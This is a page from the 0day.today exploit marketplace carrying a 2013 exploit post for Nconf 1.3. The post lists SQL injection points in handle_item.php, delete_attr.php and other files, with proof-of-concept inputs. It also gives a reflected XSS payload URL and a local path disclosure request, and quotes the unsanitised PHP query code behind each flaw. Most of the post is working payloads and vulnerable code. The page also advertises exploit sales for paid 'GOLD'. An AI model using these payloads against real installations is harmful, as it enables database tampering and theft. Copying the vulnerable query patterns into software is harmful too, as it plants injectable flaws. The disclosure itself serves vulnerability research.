0day.today - Biggest Exploit Database in the World.

- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!

Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Nconf 1.3 SQL Injection / Cross Site Scripting Vulnerabilities
# Exploit Title: nconf handle_item.php,Modify_attr.php etc Multiple Sql injection # Date: 2013/3/4 # Exploit Author: Saadat Ullah,saadi_linux@rocketmail.com # Software Link: http://sourceforge.net/projects/nconf/files/nconf/ # Vendors: http://www.nconf.org/ # Author HomePage: http://security-geeks.blogspot.com/ # Version: nconf 1.3 # Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3 Nconf Is vulnerable to Sql injection in most of the files , they did'nt sanitize any GET POST FILEDs. Some OF them Are Blind Sqli In handle_item.php on Id parameter handle_item.php?id=1' P0c $query2 .= ' AND id_item <> '.$_GET["id"]; delete_attr.php POST DATA : id=15'&name=&delete=yes&submit=Delete Poc Id Via GEt FIELD $query = 'SELECT attr_name, config_class FROM ConfigAttrs, ConfigClasses WHERE id_attr='.$_GET["id"].' AND fk_id_class=ConfigClasses.id_class'; And id via Post Field $query = 'DELETE FROM ConfigAttrs WHERE id_attr='.$_POST["id"]; clone_host_write2db.php Again On id paramerter. Their are Many more... A Simple Reflected XSS http://localhost/nconf/handle_item.php?item=<script>alert('Hi');</script> Poc $item_class = $_GET["item"]; . . echo without Sanitization echo '<h2>'.ucfirst($handle_action).' '.$item_class.'</h2>'; A LocalPath Disclose http://localhost/nconf/call_file.php?ajax_file=service_list.php&debug=yes Post Data: host_id=5372&highlight_service=5373&class=a #Independent Pakistani Security Researcher # 0day.today [2024-12-27] #